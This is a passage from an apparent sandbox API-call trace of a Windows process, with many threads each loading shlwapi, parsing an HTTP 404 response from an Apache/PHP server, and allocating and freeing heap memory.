dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0227.982] GetProcessHeap () returned 0x840000 [0227.982] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 83 os_tid = 0x5ac [0228.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.621] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.621] GetProcessHeap () returned 0x840000 [0228.621] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0228.621] GetProcessHeap () returned 0x840000 [0228.621] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0228.621] GetProcessHeap () returned 0x840000 [0228.621] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 84 os_tid = 0x92c [0229.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.142] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:08 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.142] GetProcessHeap () returned 0x840000 [0229.142] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0229.142] GetProcessHeap () returned 0x840000 [0229.142] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0229.142] GetProcessHeap () returned 0x840000 [0229.142] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 85 os_tid = 0x758 [0229.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.749] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:08 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.749] GetProcessHeap () returned 0x840000 [0229.749] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0229.749] GetProcessHeap () returned 0x840000 [0229.749] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0229.749] GetProcessHeap () returned 0x840000 [0229.749] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 86 os_tid = 0xecc [0230.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0230.278] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:09 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.278] GetProcessHeap () returned 0x840000 [0230.278] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0230.278] GetProcessHeap () returned 0x840000 [0230.278] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0230.278] GetProcessHeap () returned 0x840000 [0230.278] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 87 os_tid = 0xe78 [0231.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0231.321] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:10 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.321] GetProcessHeap () returned 0x840000 [0231.321] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0231.322] GetProcessHeap () returned 0x840000 [0231.322] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0231.322] GetProcessHeap () returned 0x840000 [0231.322] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 88 os_tid = 0x968 [0232.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.031] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:11 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.031] GetProcessHeap () returned 0x840000 [0232.031] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0232.031] GetProcessHeap () returned 0x840000 [0232.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0232.031] GetProcessHeap () returned 0x840000 [0232.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 89 os_tid = 0x9b8 [0232.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0232.590] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:11 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.591] GetProcessHeap () returned 0x840000 [0232.591] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0232.591] GetProcessHeap () returned 0x840000 [0232.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0232.591] GetProcessHeap () returned 0x840000 [0232.591] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 90 os_tid = 0xedc [0233.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.094] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:12 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0233.094] GetProcessHeap () returned 0x840000 [0233.094] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0233.094] GetProcessHeap () returned 0x840000 [0233.094] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0233.094] GetProcessHeap () returned 0x840000 [0233.094] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 91 os_tid = 0x8bc [0233.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0233.752] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:12 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0233.752] GetProcessHeap () returned 0x840000 [0233.752] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0233.752] GetProcessHeap () returned 0x840000 [0233.752] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0233.752] GetProcessHeap () returned 0x840000 [0233.752] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 92 os_tid = 0xcf4 [0234.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0234.280] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:13 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0234.280] GetProcessHeap () returned 0x840000 [0234.280] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0234.280] GetProcessHeap () returned 0x840000 [0234.280] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0234.280] GetProcessHeap () returned 0x840000 [0234.280] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 93 os_tid = 0x13f8 [0234.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0234.865] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:13 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0234.865] GetProcessHeap () returned 0x840000 [0234.865] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0234.865] GetProcessHeap () returned 0x840000 [0234.865] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0234.865] GetProcessHeap () returned 0x840000 [0234.865] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 94 os_tid = 0x1328 [0235.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0235.607] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:14 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0235.607] GetProcessHeap () returned 0x840000 [0235.607] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878ab8 [0235.607] GetProcessHeap () returned 0x840000 [0235.607] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878ab8 | out: hHeap=0x840000) returned 1 [0235.607] GetProcessHeap () returned 0x840000 [0235.608] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 95 os_tid = 0x1304 [0236.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.308] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:15 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.308] GetProcessHeap () returned 0x840000 [0236.308] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0236.308] GetProcessHeap () returned 0x840000 [0236.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0236.308] GetProcessHeap () returned 0x840000 [0236.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 96 os_tid = 0x1320 [0236.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0236.804] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:15 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.804] GetProcessHeap () returned 0x840000 [0236.804] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0236.804] GetProcessHeap () returned 0x840000 [0236.805] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0236.805] GetProcessHeap () returned 0x840000 [0236.805] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 97 os_tid = 0x1334 [0237.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0237.570] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:16 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0237.570] GetProcessHeap () returned 0x840000 [0237.599] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0237.599] GetProcessHeap () returned 0x840000 [0237.599] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0237.599] GetProcessHeap () returned 0x840000 [0237.599] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 98 os_tid = 0x1324 [0238.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0238.146] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:17 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.146] GetProcessHeap () returned 0x840000 [0238.146] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0238.146] GetProcessHeap () returned 0x840000 [0238.146] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0238.146] GetProcessHeap () returned 0x840000 [0238.146] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 99 os_tid = 0x131c [0241.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0241.194] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:20 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.194] GetProcessHeap () returned 0x840000 [0241.194] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0241.194] GetProcessHeap () returned 0x840000 [0241.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0241.194] GetProcessHeap () returned 0x840000 [0241.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 100 os_tid = 0xa6c [0242.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.266] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:21 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.266] GetProcessHeap () returned 0x840000 [0242.266] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0242.266] GetProcessHeap () returned 0x840000 [0242.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0242.266] GetProcessHeap () returned 0x840000 [0242.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 101 os_tid = 0xa70 [0242.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.805] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:21 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.805] GetProcessHeap () returned 0x840000 [0242.805] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0242.805] GetProcessHeap () returned 0x840000 [0242.805] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0242.805] GetProcessHeap () returned 0x840000 [0242.805] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 102 os_tid = 0xb50 [0243.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.274] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:22 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.274] GetProcessHeap () returned 0x840000 [0243.274] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0243.274] GetProcessHeap () returned 0x840000 [0243.274] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0243.274] GetProcessHeap () returned 0x840000 [0243.275] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 103 os_tid = 0xcc4 [0243.795] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0243.796] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:22 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.796] GetProcessHeap () returned 0x840000 [0243.796] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0243.796] GetProcessHeap () returned 0x840000 [0243.796] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0243.796] GetProcessHeap () returned 0x840000 [0243.796] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 104 os_tid = 0xd64 [0244.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0244.549] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:23 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.549] GetProcessHeap () returned 0x840000 [0244.549] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0244.549] GetProcessHeap () returned 0x840000 [0244.549] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0244.549] GetProcessHeap () returned 0x840000 [0244.549] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 105 os_tid = 0xa24 [0245.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.103] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:24 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.103] GetProcessHeap () returned 0x840000 [0245.103] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0245.103] GetProcessHeap () returned 0x840000 [0245.103] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0245.103] GetProcessHeap () returned 0x840000 [0245.103] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 106 os_tid = 0x704 [0245.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0245.745] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:24 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.745] GetProcessHeap () returned 0x840000 [0245.745] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0245.745] GetProcessHeap () returned 0x840000 [0245.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0245.745] GetProcessHeap () returned 0x840000 [0245.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 107 os_tid = 0xbe8 [0246.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.190] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:25 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.190] GetProcessHeap () returned 0x840000 [0246.190] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0246.190] GetProcessHeap () returned 0x840000 [0246.190] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0246.190] GetProcessHeap () returned 0x840000 [0246.191] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 108 os_tid = 0xb4c [0246.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0246.918] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:25 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.918] GetProcessHeap () returned 0x840000 [0246.918] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0246.918] GetProcessHeap () returned 0x840000 [0246.919] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0246.919] GetProcessHeap () returned 0x840000 [0246.919] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 109 os_tid = 0x948 [0247.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0247.554] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:26 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0247.554] GetProcessHeap () returned 0x840000 [0247.554] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0247.554] GetProcessHeap () returned 0x840000 [0247.554] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0247.554] GetProcessHeap () returned 0x840000 [0247.554] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 Thread: id = 110 os_tid = 0xa14 [0248.179] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.180] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:27 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.180] GetProcessHeap () returned 0x840000 [0248.180] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0248.180] GetProcessHeap () returned 0x840000 [0248.180] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0248.180] GetProcessHeap () returned 0x840000 [0248.180] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 Thread: id = 111 os_tid = 0x604 [0248.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.783] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:27:27 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.783] GetProcessHeap () returned 0x840000 [0248.783] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0248.783] GetProcessHeap () returned 0x840000 [0248.783] HeapFree (in: hHeap=0x840000, dwFlags=0x0, 